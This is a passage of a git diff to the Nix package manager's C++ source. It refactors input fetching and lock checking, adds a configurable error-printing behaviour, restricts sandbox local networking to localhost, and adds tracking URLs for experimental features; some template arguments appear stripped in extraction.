auto attrs2 = state.buildBindings(8);
state.mkStorePathString(storePath, attrs2.alloc(state.sOutPath));
diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc
index cfedfa6c4..5061e40fd 100644
--- a/src/libexpr/primops/fetchTree.cc
+++ b/src/libexpr/primops/fetchTree.cc
@@ -182,7 +182,7 @@ static void fetchTree(
state.checkURI(input.toURLString());
- auto [storePath, input2] = input.fetch(state.store);
+ auto [storePath, input2] = input.fetchToStore(state.store);
state.allowPath(storePath);
diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh
index 6c5e80c61..080ba26b8 100644
--- a/src/libexpr/print-options.hh
+++ b/src/libexpr/print-options.hh
@@ -8,6 +8,29 @@
namespace nix {
+/**
+ * How errors should be handled when printing values.
+ */
+enum class ErrorPrintBehavior {
+ /**
+ * Print the first line of the error in brackets: `«error: oh no!»`
+ */
+ Print,
+ /**
+ * Throw the error to the code that attempted to print the value, instead
+ * of suppressing it it.
+ */
+ Throw,
+ /**
+ * Only throw the error if encountered at the top level of the expression.
+ *
+ * This will cause expressions like `builtins.throw "uh oh!"` to throw
+ * errors, but will print attribute sets and other nested structures
+ * containing values that error (like `nixpkgs`) normally.
+ */
+ ThrowTopLevel,
+};
+
/**
* Options for printing Nix values.
*/
@@ -68,6 +91,11 @@ struct PrintOptions
*/
size_t prettyIndent = 0;
+ /**
+ * How to handle errors encountered while printing values.
+ */
+ ErrorPrintBehavior errors = ErrorPrintBehavior::Print;
+
/**
* True if pretty-printing is enabled.
*/
@@ -86,7 +114,7 @@ static PrintOptions errorPrintOptions = PrintOptions {
.maxDepth = 10,
.maxAttrs = 10,
.maxListItems = 10,
- .maxStringLength = 1024
+ .maxStringLength = 1024,
};
}
diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc
index 9d280f623..f67e94750 100644
--- a/src/libexpr/print.cc
+++ b/src/libexpr/print.cc
@@ -271,25 +271,21 @@ private:
void printDerivation(Value & v)
{
- try {
- Bindings::iterator i = v.attrs->find(state.sDrvPath);
- NixStringContext context;
- std::string storePath;
- if (i != v.attrs->end())
- storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation"));
+ Bindings::iterator i = v.attrs->find(state.sDrvPath);
+ NixStringContext context;
+ std::string storePath;
+ if (i != v.attrs->end())
+ storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation"));
- if (options.ansiColors)
- output << ANSI_GREEN;
- output << "«derivation";
- if (!storePath.empty()) {
- output << " " << storePath;
- }
- output << "»";
- if (options.ansiColors)
- output << ANSI_NORMAL;
- } catch (Error & e) {
- printError_(e);
+ if (options.ansiColors)
+ output << ANSI_GREEN;
+ output << "«derivation";
+ if (!storePath.empty()) {
+ output << " " << storePath;
}
+ output << "»";
+ if (options.ansiColors)
+ output << ANSI_NORMAL;
}
bool shouldPrettyPrintAttrs(AttrVec & v)
@@ -510,64 +506,68 @@ private:
output.flush();
checkInterrupt();
- if (options.force) {
- try {
+ try {
+ if (options.force) {
state.forceValue(v, v.determinePos(noPos));
- } catch (Error & e) {
- printError_(e);
- return;
}
- }
- switch (v.type()) {
+ switch (v.type()) {
- case nInt:
- printInt(v);
- break;
+ case nInt:
+ printInt(v);
+ break;
- case nFloat:
- printFloat(v);
- break;
+ case nFloat:
+ printFloat(v);
+ break;
- case nBool:
- printBool(v);
- break;
+ case nBool:
+ printBool(v);
+ break;
- case nString:
- printString(v);
- break;
+ case nString:
+ printString(v);
+ break;
- case nPath:
- printPath(v);
- break;
+ case nPath:
+ printPath(v);
+ break;
- case nNull:
- printNull();
- break;
+ case nNull:
+ printNull();
+ break;
- case nAttrs:
- printAttrs(v, depth);
- break;
+ case nAttrs:
+ printAttrs(v, depth);
+ break;
- case nList:
- printList(v, depth);
- break;
+ case nList:
+ printList(v, depth);
+ break;
- case nFunction:
- printFunction(v);
- break;
+ case nFunction:
+ printFunction(v);
+ break;
- case nThunk:
- printThunk(v);
- break;
+ case nThunk:
+ printThunk(v);
+ break;
- case nExternal:
- printExternal(v);
- break;
+ case nExternal:
+ printExternal(v);
+ break;
- default:
- printUnknown();
- break;
+ default:
+ printUnknown();
+ break;
+ }
+ } catch (Error & e) {
+ if (options.errors == ErrorPrintBehavior::Throw
+ || (options.errors == ErrorPrintBehavior::ThrowTopLevel
+ && depth == 0)) {
+ throw;
+ }
+ printError_(e);
}
}
diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc
index 363ad018e..483796f0b 100644
--- a/src/libfetchers/fetchers.cc
+++ b/src/libfetchers/fetchers.cc
@@ -161,7 +161,7 @@ bool Input::contains(const Input & other) const
return false;
}
-std::pair Input::fetch(ref store) const
+std::pair Input::fetchToStore(ref store) const
{
if (!scheme)
throw Error("cannot fetch unsupported input '%s'", attrsToJSON(toAttrs()));
@@ -186,56 +186,85 @@ std::pair Input::fetch(ref store) const
auto [storePath, input] = [&]() -> std::pair {
try {
- return scheme->fetch(store, *this);
+ auto [accessor, final] = getAccessorUnchecked(store);
+
+ auto storePath = nix::fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, final.getName());
+
+ auto narHash = store->queryPathInfo(storePath)->narHash;
+ final.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
+
+ scheme->checkLocks(*this, final);
+
+ return {storePath, final};
} catch (Error & e) {
e.addTrace({}, "while fetching the input '%s'", to_string());
throw;
}
}();
- auto narHash = store->queryPathInfo(storePath)->narHash;
- input.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
-
- if (auto prevNarHash = getNarHash()) {
- if (narHash != *prevNarHash)
- throw Error((unsigned int) 102, "NAR hash mismatch in input '%s' (%s), expected '%s', got '%s'",
- to_string(),
- store->printStorePath(storePath),
- prevNarHash->to_string(HashFormat::SRI, true),
- narHash.to_string(HashFormat::SRI, true));
- }
-
- if (auto prevLastModified = getLastModified()) {
- if (input.getLastModified() != prevLastModified)
- throw Error("'lastModified' attribute mismatch in input '%s', expected %d",
- input.to_string(), *prevLastModified);
- }
-
- if (auto prevRev = getRev()) {
- if (input.getRev() != prevRev)
- throw Error("'rev' attribute mismatch in input '%s', expected %s",
- input.to_string(), prevRev->gitRev());
- }
-
- if (auto prevRevCount = getRevCount()) {
- if (input.getRevCount() != prevRevCount)
- throw Error("'revCount' attribute mismatch in input '%s', expected %d",
- input.to_string(), *prevRevCount);
- }
-
return {std::move(storePath), input};
}
+void InputScheme::checkLocks(const Input & specified, const Input & final) const
+{
+ if (auto prevNarHash = specified.getNarHash()) {
+ if (final.getNarHash() != prevNarHash) {
+ if (final.getNarHash())
+ throw Error((unsigned int) 102, "NAR hash mismatch in input '%s', expected '%s' but got '%s'",
+ specified.to_string(), prevNarHash->to_string(HashFormat::SRI, true), final.getNarHash()->to_string(HashFormat::SRI, true));
+ else
+ throw Error((unsigned int) 102, "NAR hash mismatch in input '%s', expected '%s' but got none",
+ specified.to_string(), prevNarHash->to_string(HashFormat::SRI, true));
+ }
+ }
+
+ if (auto prevLastModified = specified.getLastModified()) {
+ if (final.getLastModified() != prevLastModified)
+ throw Error("'lastModified' attribute mismatch in input '%s', expected %d",
+ final.to_string(), *prevLastModified);
+ }
+
+ if (auto prevRev = specified.getRev()) {
+ if (final.getRev() != prevRev)
+ throw Error("'rev' attribute mismatch in input '%s', expected %s",
+ final.to_string(), prevRev->gitRev());
+ }
+
+ if (auto prevRevCount = specified.getRevCount()) {
+ if (final.getRevCount() != prevRevCount)
+ throw Error("'revCount' attribute mismatch in input '%s', expected %d",
+ final.to_string(), *prevRevCount);
+ }
+}
+
std::pair][, Input> Input::getAccessor(ref store) const
{
try {
- return scheme->getAccessor(store, *this);
+ auto [accessor, final] = getAccessorUnchecked(store);
+
+ scheme->checkLocks(*this, final);
+
+ return {accessor, std::move(final)};
} catch (Error & e) {
e.addTrace({}, "while fetching the input '%s'", to_string());
throw;
}
}
+std::pair][, Input> Input::getAccessorUnchecked(ref store) const
+{
+ // FIXME: cache the accessor
+
+ if (!scheme)
+ throw Error("cannot fetch unsupported input '%s'", attrsToJSON(toAttrs()));
+
+ auto [accessor, final] = scheme->getAccessor(store, *this);
+
+ accessor->fingerprint = scheme->getFingerprint(store, final);
+
+ return {accessor, std::move(final)};
+}
+
Input Input::applyOverrides(
std::optional ref,
std::optional rev) const
@@ -372,18 +401,6 @@ void InputScheme::clone(const Input & input, const Path & destDir) const
throw Error("do not know how to clone input '%s'", input.to_string());
}
-std::pair InputScheme::fetch(ref store, const Input & input)
-{
- auto [accessor, input2] = getAccessor(store, input);
- auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, input2.getName());
- return {storePath, input2};
-}
-
-std::pair][, Input> InputScheme::getAccessor(ref store, const Input & input) const
-{
- throw UnimplementedError("InputScheme must implement fetch() or getAccessor()");
-}
-
std::optional InputScheme::experimentalFeature() const
{
return {};
diff --git a/src/libfetchers/fetchers.hh b/src/libfetchers/fetchers.hh
index 472fba6f4..cd11f9eae 100644
--- a/src/libfetchers/fetchers.hh
+++ b/src/libfetchers/fetchers.hh
@@ -80,10 +80,21 @@ public:
* Fetch the entire input into the Nix store, returning the
* location in the Nix store and the locked input.
*/
- std::pair fetch(ref store) const;
+ std::pair fetchToStore(ref store) const;
+ /**
+ * Return an InputAccessor that allows access to files in the
+ * input without copying it to the store. Also return a possibly
+ * unlocked input.
+ */
std::pair][, Input> getAccessor(ref store) const;
+private:
+
+ std::pair][, Input> getAccessorUnchecked(ref store) const;
+
+public:
+
Input applyOverrides(
std::optional ref,
std::optional rev) const;
@@ -173,9 +184,7 @@ struct InputScheme
std::string_view contents,
std::optional commitMsg) const;
- virtual std::pair fetch(ref store, const Input & input);
-
- virtual std::pair][, Input> getAccessor(ref store, const Input & input) const;
+ virtual std::pair][, Input> getAccessor(ref store, const Input & input) const = 0;
/**
* Is this `InputScheme` part of an experimental feature?
@@ -202,6 +211,14 @@ struct InputScheme
*/
virtual bool isLocked(const Input & input) const
{ return false; }
+
+ /**
+ * Check the locking attributes in `final` against
+ * `specified`. E.g. if `specified` has a `rev` attribute, then
+ * `final` must have the same `rev` attribute. Throw an exception
+ * if there is a mismatch.
+ */
+ virtual void checkLocks(const Input & specified, const Input & final) const;
};
void registerInputScheme(std::shared_ptr && fetcher);
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index 87d114276..25eabb1dc 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -761,8 +761,6 @@ struct GitInputScheme : InputScheme
? getAccessorFromCommit(store, repoInfo, std::move(input))
: getAccessorFromWorkdir(store, repoInfo, std::move(input));
- accessor->fingerprint = final.getFingerprint(store);
-
return {accessor, std::move(final)};
}
diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index a48c99a0b..8100afe4d 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -98,6 +98,10 @@ struct GitArchiveInputScheme : InputScheme
if (ref) input.attrs.insert_or_assign("ref", *ref);
if (host_url) input.attrs.insert_or_assign("host", *host_url);
+ auto narHash = url.query.find("narHash");
+ if (narHash != url.query.end())
+ input.attrs.insert_or_assign("narHash", narHash->second);
+
return input;
}
@@ -111,6 +115,7 @@ struct GitArchiveInputScheme : InputScheme
"narHash",
"lastModified",
"host",
+ "treeHash",
};
}
@@ -134,10 +139,13 @@ struct GitArchiveInputScheme : InputScheme
assert(!(ref && rev));
if (ref) path += "/" + *ref;
if (rev) path += "/" + rev->to_string(HashFormat::Base16, false);
- return ParsedURL {
+ auto url = ParsedURL {
.scheme = std::string { schemeName() },
.path = path,
};
+ if (auto narHash = input.getNarHash())
+ url.query.insert_or_assign("narHash", narHash->to_string(HashFormat::SRI, true));
+ return url;
}
Input applyOverrides(
@@ -268,15 +276,15 @@ struct GitArchiveInputScheme : InputScheme
{
auto [input, tarballInfo] = downloadArchive(store, _input);
+ #if 0
input.attrs.insert_or_assign("treeHash", tarballInfo.treeHash.gitRev());
+ #endif
input.attrs.insert_or_assign("lastModified", uint64_t(tarballInfo.lastModified));
auto accessor = getTarballCache()->getAccessor(tarballInfo.treeHash, false);
accessor->setPathDisplay("«" + input.to_string() + "»");
- accessor->fingerprint = input.getFingerprint(store);
-
return {accessor, input};
}
diff --git a/src/libfetchers/indirect.cc b/src/libfetchers/indirect.cc
index 002c0c292..3f21445e1 100644
--- a/src/libfetchers/indirect.cc
+++ b/src/libfetchers/indirect.cc
@@ -97,7 +97,7 @@ struct IndirectInputScheme : InputScheme
return input;
}
- std::pair fetch(ref store, const Input & input) override
+ std::pair][, Input> getAccessor(ref store, const Input & input) const override
{
throw Error("indirect input '%s' cannot be fetched directly", input.to_string());
}
diff --git a/src/libfetchers/mercurial.cc b/src/libfetchers/mercurial.cc
index a5f55a44e..a2702338f 100644
--- a/src/libfetchers/mercurial.cc
+++ b/src/libfetchers/mercurial.cc
@@ -6,8 +6,8 @@
#include "tarfile.hh"
#include "store-api.hh"
#include "url-parts.hh"
+#include "fs-input-accessor.hh"
#include "posix-source-accessor.hh"
-
#include "fetch-settings.hh"
#include
@@ -161,9 +161,9 @@ struct MercurialInputScheme : InputScheme
return {isLocal, isLocal ? url.path : url.base};
}
- std::pair fetch(ref store, const Input & _input) override
+ StorePath fetchToStore(ref store, Input & input) const
{
- Input input(_input);
+ auto origRev = input.getRev();
auto name = input.getName();
@@ -218,7 +218,7 @@ struct MercurialInputScheme : InputScheme
FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {},
filter);
- return {std::move(storePath), input};
+ return storePath;
}
}
@@ -242,13 +242,12 @@ struct MercurialInputScheme : InputScheme
});
};
- auto makeResult = [&](const Attrs & infoAttrs, StorePath && storePath)
- -> std::pair
+ auto makeResult = [&](const Attrs & infoAttrs, const StorePath & storePath) -> StorePath
{
assert(input.getRev());
- assert(!_input.getRev() || _input.getRev() == input.getRev());
+ assert(!origRev || origRev == input.getRev());
input.attrs.insert_or_assign("revCount", getIntAttr(infoAttrs, "revCount"));
- return {std::move(storePath), input};
+ return storePath;
};
if (input.getRev()) {
@@ -329,7 +328,7 @@ struct MercurialInputScheme : InputScheme
{"revCount", (uint64_t) revCount},
});
- if (!_input.getRev())
+ if (!origRev)
getCache()->add(
*store,
unlockedAttrs,
@@ -347,6 +346,15 @@ struct MercurialInputScheme : InputScheme
return makeResult(infoAttrs, std::move(storePath));
}
+ std::pair][, Input> getAccessor(ref store, const Input & _input) const override
+ {
+ Input input(_input);
+
+ auto storePath = fetchToStore(store, input);
+
+ return {makeStorePathAccessor(store, storePath), input};
+ }
+
bool isLocked(const Input & input) const override
{
return (bool) input.getRev();
diff --git a/src/libfetchers/path.cc b/src/libfetchers/path.cc
index 276fd1b36..0af1bad73 100644
--- a/src/libfetchers/path.cc
+++ b/src/libfetchers/path.cc
@@ -1,6 +1,8 @@
#include "fetchers.hh"
#include "store-api.hh"
#include "archive.hh"
+#include "fs-input-accessor.hh"
+#include "posix-source-accessor.hh"
namespace nix::fetchers {
@@ -87,6 +89,15 @@ struct PathInputScheme : InputScheme
writeFile((CanonPath(getAbsPath(input)) / path).abs(), contents);
}
+ std::optional isRelative(const Input & input) const
+ {
+ auto path = getStrAttr(input.attrs, "path");
+ if (hasPrefix(path, "/"))
+ return std::nullopt;
+ else
+ return path;
+ }
+
bool isLocked(const Input & input) const override
{
return (bool) input.getNarHash();
@@ -102,7 +113,7 @@ struct PathInputScheme : InputScheme
throw Error("cannot fetch input '%s' because it uses a relative path", input.to_string());
}
- std::pair fetch(ref store, const Input & _input) override
+ std::pair][, Input> getAccessor(ref store, const Input & _input) const override
{
Input input(_input);
std::string absPath;
@@ -144,7 +155,24 @@ struct PathInputScheme : InputScheme
}
input.attrs.insert_or_assign("lastModified", uint64_t(mtime));
- return {std::move(*storePath), input};
+ return {makeStorePathAccessor(store, *storePath), std::move(input)};
+ }
+
+ std::optional getFingerprint(ref store, const Input & input) const override
+ {
+ if (isRelative(input))
+ return std::nullopt;
+
+ /* If this path is in the Nix store, use the hash of the
+ store object and the subpath. */
+ auto path = getAbsPath(input);
+ try {
+ auto [storePath, subPath] = store->toStorePath(path.abs());
+ auto info = store->queryPathInfo(storePath);
+ return fmt("path:%s:%s", info->narHash.to_string(HashFormat::Base16, false), subPath);
+ } catch (Error &) {
+ return std::nullopt;
+ }
}
std::optional experimentalFeature() const override
diff --git a/src/libstore/build-result.hh b/src/libstore/build-result.hh
index 8840fa7e3..3636ad3a4 100644
--- a/src/libstore/build-result.hh
+++ b/src/libstore/build-result.hh
@@ -123,6 +123,11 @@ struct KeyedBuildResult : BuildResult
* The derivation we built or the store path we substituted.
*/
DerivedPath path;
+
+ // Hack to work around a gcc "may be used uninitialized" warning.
+ KeyedBuildResult(BuildResult res, DerivedPath path)
+ : BuildResult(std::move(res)), path(std::move(path))
+ { }
};
}
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index a9b8de123..a9b6a8dbf 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2480,6 +2480,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
CanonPath { tmpDir + "/tmp" }).hash;
}
}
+ assert(false);
}();
ValidPathInfo newInfo0 {
@@ -2543,6 +2544,12 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
[&](const DerivationOutput::CAFixed & dof) {
auto & wanted = dof.ca.hash;
+ // Replace the output by a fresh copy of itself to make sure
+ // that there's no stale file descriptor pointing to it
+ Path tmpOutput = actualPath + ".tmp";
+ copyFile(actualPath, tmpOutput, true);
+ renameFile(tmpOutput, actualPath);
+
auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating {
.method = dof.ca.method,
.hashAlgo = wanted.algo,
diff --git a/src/libstore/build/sandbox-defaults.sb b/src/libstore/build/sandbox-defaults.sb
index 25ec11285..2ad5fb616 100644
--- a/src/libstore/build/sandbox-defaults.sb
+++ b/src/libstore/build/sandbox-defaults.sb
@@ -45,7 +45,7 @@ R""(
; allow it if the package explicitly asks for it.
(if (param "_ALLOW_LOCAL_NETWORKING")
(begin
- (allow network* (local ip) (local tcp) (local udp))
+ (allow network* (remote ip "localhost:*"))
; Allow access to /etc/resolv.conf (which is a symlink to
; /private/var/run/resolv.conf).
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index e1337f51d..917813342 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -415,6 +415,8 @@ static void performOp(TunnelLogger * logger, ref store,
// Use NAR; Git is not a serialization method
dumpMethod = FileSerialisationMethod::Recursive;
break;
+ default:
+ assert(false);
}
// TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store.
auto path = store->addToStoreFromDump(source, name, dumpMethod, contentAddressMethod, hashAlgo, refs, repair);
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index 8dfe8adda..09196481b 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -527,6 +527,8 @@ StorePath RemoteStore::addToStoreFromDump(
// Use NAR; Git is not a serialization method
fsm = FileSerialisationMethod::Recursive;
break;
+ default:
+ assert(false);
}
if (fsm != dumpMethod)
unsupported("RemoteStore::addToStoreFromDump doesn't support this `dumpMethod` `hashMethod` combination");
diff --git a/src/libutil/current-process.cc b/src/libutil/current-process.cc
index 47aa137d8..f80f43ef0 100644
--- a/src/libutil/current-process.cc
+++ b/src/libutil/current-process.cc
@@ -38,6 +38,11 @@ unsigned int getMaxCPU()
auto cpuMax = readFile(cpuFile);
auto cpuMaxParts = tokenizeString>(cpuMax, " \n");
+
+ if (cpuMaxParts.size() != 2) {
+ return 0;
+ }
+
auto quota = cpuMaxParts[0];
auto period = cpuMaxParts[1];
if (quota != "max")
diff --git a/src/libutil/experimental-features.cc b/src/libutil/experimental-features.cc
index e1a8b5b9d..42a33ffca 100644
--- a/src/libutil/experimental-features.cc
+++ b/src/libutil/experimental-features.cc
@@ -1,4 +1,5 @@
#include "experimental-features.hh"
+#include "fmt.hh"
#include "util.hh"
#include "nlohmann/json.hpp"
@@ -10,6 +11,7 @@ struct ExperimentalFeatureDetails
ExperimentalFeature tag;
std::string_view name;
std::string_view description;
+ std::string_view trackingUrl;
};
/**
@@ -35,6 +37,7 @@ constexpr std::array xpFeatureDetails
[__contentAddressed](@docroot@/language/advanced-attributes.md#adv-attr-__contentAddressed)
for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/35",
},
{
.tag = Xp::ImpureDerivations,
@@ -65,6 +68,7 @@ constexpr std::array xpFeatureDetails
This is a more explicit alternative to using [`builtins.currentTime`](@docroot@/language/builtin-constants.md#builtins-currentTime).
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/42",
},
{
.tag = Xp::Flakes,
@@ -73,6 +77,7 @@ constexpr std::array xpFeatureDetails
Enable flakes. See the manual entry for [`nix
flake`](@docroot@/command-ref/new-cli/nix3-flake.md) for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/27",
},
{
.tag = Xp::FetchTree,
@@ -86,6 +91,7 @@ constexpr std::array xpFeatureDetails
Enabling just this feature serves as a "release candidate", allowing users to try it out in isolation.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/31",
},
{
.tag = Xp::NixCommand,
@@ -94,6 +100,7 @@ constexpr std::array xpFeatureDetails
Enable the new `nix` subcommands. See the manual on
[`nix`](@docroot@/command-ref/new-cli/nix.md) for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/28",
},
{
.tag = Xp::GitHashing,
@@ -102,6 +109,7 @@ constexpr std::array xpFeatureDetails
Allow creating (content-addressed) store objects which are hashed via Git's hashing algorithm.
These store objects will not be understandable by older versions of Nix.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/41",
},
{
.tag = Xp::RecursiveNix,
@@ -143,6 +151,7 @@ constexpr std::array xpFeatureDetails
already in the build inputs or built by a previous recursive Nix
call.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/47",
},
{
.tag = Xp::NoUrlLiterals,
@@ -184,6 +193,7 @@ constexpr std::array xpFeatureDetails
containing parameters have to be quoted anyway, and unquoted URLs
may confuse external tooling.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/44",
},
{
.tag = Xp::FetchClosure,
@@ -191,6 +201,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Enable the use of the [`fetchClosure`](@docroot@/language/builtins.md#builtins-fetchClosure) built-in function in the Nix language.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/40",
},
{
.tag = Xp::ReplFlake,
@@ -200,6 +211,7 @@ constexpr std::array xpFeatureDetails
Allow passing [installables](@docroot@/command-ref/new-cli/nix.md#installables) to `nix repl`, making its interface consistent with the other experimental commands.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/32",
},
{
.tag = Xp::AutoAllocateUids,
@@ -208,6 +220,7 @@ constexpr std::array xpFeatureDetails
Allows Nix to automatically pick UIDs for builds, rather than creating
`nixbld*` user accounts. See the [`auto-allocate-uids`](@docroot@/command-ref/conf-file.md#conf-auto-allocate-uids) setting for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/34",
},
{
.tag = Xp::Cgroups,
@@ -216,6 +229,7 @@ constexpr std::array xpFeatureDetails
Allows Nix to execute builds inside cgroups. See
the [`use-cgroups`](@docroot@/command-ref/conf-file.md#conf-use-cgroups) setting for details.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/36",
},
{
.tag = Xp::DaemonTrustOverride,
@@ -226,6 +240,7 @@ constexpr std::array xpFeatureDetails
useful for various experiments with `nix-daemon --stdio`
networking.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/38",
},
{
.tag = Xp::DynamicDerivations,
@@ -239,6 +254,7 @@ constexpr std::array xpFeatureDetails
- dependencies in derivations on the outputs of
derivations that are themselves derivations outputs.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/39",
},
{
.tag = Xp::ParseTomlTimestamps,
@@ -246,6 +262,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow parsing of timestamps in builtins.fromTOML.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/45",
},
{
.tag = Xp::ReadOnlyLocalStore,
@@ -253,6 +270,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow the use of the `read-only` parameter in [local store](@docroot@/store/types/local-store.md) URIs.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/46",
},
{
.tag = Xp::LocalOverlayStore,
@@ -260,7 +278,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow the use of [local overlay store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-overlay-store).
)",
- .trackingUrl = ""https://github.com/NixOS/nix/milestone/50",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/50",
},
{
.tag = Xp::ConfigurableImpureEnv,
@@ -268,6 +286,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow the use of the [impure-env](@docroot@/command-ref/conf-file.md#conf-impure-env) setting.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/37",
},
{
.tag = Xp::MountedSSHStore,
@@ -275,6 +294,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Allow the use of the [`mounted SSH store`](@docroot@/command-ref/new-cli/nix3-help-stores.html#experimental-ssh-store-with-filesytem-mounted).
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/43",
},
{
.tag = Xp::VerifiedFetches,
@@ -282,6 +302,7 @@ constexpr std::array xpFeatureDetails
.description = R"(
Enables verification of git commit signatures through the [`fetchGit`](@docroot@/language/builtins.md#builtins-fetchGit) built-in.
)",
+ .trackingUrl = "https://github.com/NixOS/nix/milestone/48",
},
}};
@@ -320,9 +341,12 @@ std::string_view showExperimentalFeature(const ExperimentalFeature tag)
nlohmann::json documentExperimentalFeatures()
{
StringMap res;
- for (auto & xpFeature : xpFeatureDetails)
- res[std::string { xpFeature.name }] =
- trim(stripIndentation(xpFeature.description));
+ for (auto & xpFeature : xpFeatureDetails) {
+ std::stringstream docOss;
+ docOss << stripIndentation(xpFeature.description);
+ docOss << fmt("\nRefer to [%1% tracking issue](%2%) for feature tracking.", xpFeature.name, xpFeature.trackingUrl);
+ res[std::string{xpFeature.name}] = trim(docOss.str());
+ }
return (nlohmann::json) res;
}
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 471bda6a0..570247b9e 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -123,7 +123,7 @@ Hash hashPath(
case FileIngestionMethod::Git:
return git::dumpHash(ht, accessor, path, filter).hash;
}
-
+ assert(false);
}
}
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index b0a3f0797..9dd6a5133 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -617,6 +617,11 @@ void copy(const fs::directory_entry & from, const fs::path & to, bool andDelete)
}
}
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete)
+{
+ return copy(fs::directory_entry(fs::path(oldPath)), fs::path(newPath), andDelete);
+}
+
void renameFile(const Path & oldName, const Path & newName)
{
fs::rename(oldName, newName);
diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh
index 464efc242..963265e34 100644
--- a/src/libutil/file-system.hh
+++ b/src/libutil/file-system.hh
@@ -186,6 +186,13 @@ void renameFile(const Path & src, const Path & dst);
*/
void moveFile(const Path & src, const Path & dst);
+/**
+ * Recursively copy the content of `oldPath` to `newPath`. If `andDelete` is
+ * `true`, then also remove `oldPath` (making this equivalent to `moveFile`, but
+ * with the guaranty that the destination will be “fresh”, with no stale inode
+ * or file descriptor pointing to it).
+ */
+void copyFile(const Path & oldPath, const Path & newPath, bool andDelete);
/**
* Automatic cleanup of resources.
diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh
index e996f4ba2..abbaf95b6 100644
--- a/src/libutil/fmt.hh
+++ b/src/libutil/fmt.hh
@@ -8,7 +8,6 @@
namespace nix {
-namespace {
/**
* A helper for writing `boost::format` expressions.
*
@@ -35,14 +34,13 @@ inline void formatHelper(F & f, const T & x, const Args & ... args)
/**
* Set the correct exceptions for `fmt`.
*/
-void setExceptions(boost::format & fmt)
+inline void setExceptions(boost::format & fmt)
{
fmt.exceptions(
boost::io::all_error_bits ^
boost::io::too_many_args_bit ^
boost::io::too_few_args_bit);
}
-}
/**
* A helper for writing a `boost::format` expression to a string.
diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 5733531fa..0b6e35222 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -56,31 +56,63 @@ void parseBlob(
FileSystemObjectSink & sink,
const Path & sinkPath,
Source & source,
- bool executable,
+ BlobMode blobMode,
const ExperimentalFeatureSettings & xpSettings)
{
xpSettings.require(Xp::GitHashing);
- sink.createRegularFile(sinkPath, [&](auto & crf) {
- if (executable)
- crf.isExecutable();
+ unsigned long long size = std::stoi(getStringUntil(source, 0));
- unsigned long long size = std::stoi(getStringUntil(source, 0));
+ auto doRegularFile = [&](bool executable) {
+ sink.createRegularFile(sinkPath, [&](auto & crf) {
+ if (executable)
+ crf.isExecutable();
- crf.preallocateContents(size);
+ crf.preallocateContents(size);
- unsigned long long left = size;
- std::string buf;
- buf.reserve(65536);
+ unsigned long long left = size;
+ std::string buf;
+ buf.reserve(65536);
- while (left) {
+ while (left) {
+ checkInterrupt();
+ buf.resize(std::min((unsigned long long)buf.capacity(), left));
+ source(buf);
